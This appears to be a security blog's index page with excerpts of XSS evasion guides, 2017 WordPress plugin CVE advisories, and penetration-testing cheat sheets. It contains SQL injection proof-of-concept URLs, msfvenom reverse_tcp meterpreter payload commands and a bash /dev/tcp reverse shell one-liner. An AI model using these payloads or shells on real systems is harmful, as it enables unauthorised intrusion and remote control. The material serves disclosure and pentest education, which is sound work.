During a penetration test we may face input sanitisation issues that can lead to various XSS attacks. However, many times we are not able to trigger these issues and perform an attack with an actual impact. For example, we may find an XSS on a submit form which sends the user’s data with POST requests. Moreover, these data are…
Guide: Cross-Site Scripting (XSS) Evasion Techniques – Part 2
After sorting out the basic concepts in Part 1, I think it’s time to continue with more complicated techniques. Our main area of focus will be the evasion of misconfigured Anti-XSS modules. In case the web application forbids the character “/” and the payload is reflected into the HTML document we can use an HTML tag which does not have…
Guide: Cross-Site Scripting (XSS) Basic Exploitation Techniques – Part 1
Disclaimer: This is not an advanced guide for the discovery and mitigation of Cross-Site Scripting (hereinafter XSS). It is just a beginner’s guide in XSS with the goal to mitigate common client side injection attacks. We will have a second post regarding advanced XSS attacks but for now we need to build from the ground up. Of course, everything described…
CVE-2017-9419: WordPress WP Custom Fields Search v.0.3.28 Reflected Cross-Site Scripting (XSS)
Identification Date: 11/06/2017 Vendor Homepage: http://www.webhammer.co.uk/wordpress#tab-wp-custom-fields-search Software Link: http://wordpress.org/plugins/wp-custom-fields-search/ Description This version of the WP Custom Fields Search plug-in is vulnerable to a Reflected Cross-Site Scripting vulnerability in the “cs-all-0” parameter due to the lack of proper input handling of the user’s data. An attacker can execute arbitrary JavaScript using a specially crafted URL. Thus, when the victim clicks…
CVE-2017-9429: Event List Version v.0.7.8 Blind Based SQL Injection (SQLi)
Identification Date: 04/06/2017 Vendor Homepage: https://profiles.wordpress.org/mibuthu Software Link: https://wordpress.org/plugins/event-list/ An authenticated user can exploit this vulnerability by editing an event. Each event has an id parameter which is not properly sanitized. An attacker can exploit the vulnerable parameter and execute arbitrary SQL queries using blind-based SQL injection. Proof of Concept In order to replay the attack, use the…
CVE-2017-9603: WordPress WP Jobs v.1.4 SQL Injection (SQLi)
Identification Date: 11/06/2017 Vendor Homepage: http://www.intensewp.com/ Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/ Description SQL injection vulnerability in the WP Jobs plug-in 1.4 for WordPress allows an authenticated user to execute arbitrary SQL commands via the jobid parameter. Proof of Concept In order to replay the attack, use the link below. http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment The results of the SQL injection are…
CVE-2017-9418: WP-Testimonials WordPress Plugin v.3.4.1 Union Based SQL Injection (SQLi)
Identification Date: 02/06/2017 Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/ Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/ Description SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows an authenticated user to execute arbitrary SQL commands via the testid parameter. Proof of Concept A Proof of Concept code is provided below. http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL-- comment The results of the SQL injection are being reflected in…
Cheatsheet: Metasploit Payloads
Windows You can use the following command in order to create an EXE file for a Windows machine. msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f exe > shell.exe Linux In order to gain access to a Linux host, an ELF file must be created. You can use the following line for that. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port]…
Cheatsheet: Reverse Shells
Bash When we don’t have any other third-party tool to get a reverse shell back, we can always redirect Bash to our host using the following command. bash -i >& /dev/tcp/[Your IP]/[Your Port] 0>&1 Python When we want to get a reverse shell on Linux, we can do it by abusing the interpreters which come with the Operating…
CVE-2017-9420: WordPress Spiffy Calendar v.3.2.0 Reflected Cross-Site Scripting (XSS)
Identification Date: 02/06/2017 Vendor Homepage: http://spiffycalendar.sunnythemes.com/ Software Link: https://wordpress.org/plugins/spiffy-calendar Description This version of the Spiffy Calendar plug-in is vulnerable to a Reflected Cross-Site Scripting vulnerability in the “yr” parameter due to the lack of proper input handling of the user’s data. An attacker can execute arbitrary JavaScript using a specially crafted URL. Thus, when the victim clicks on the…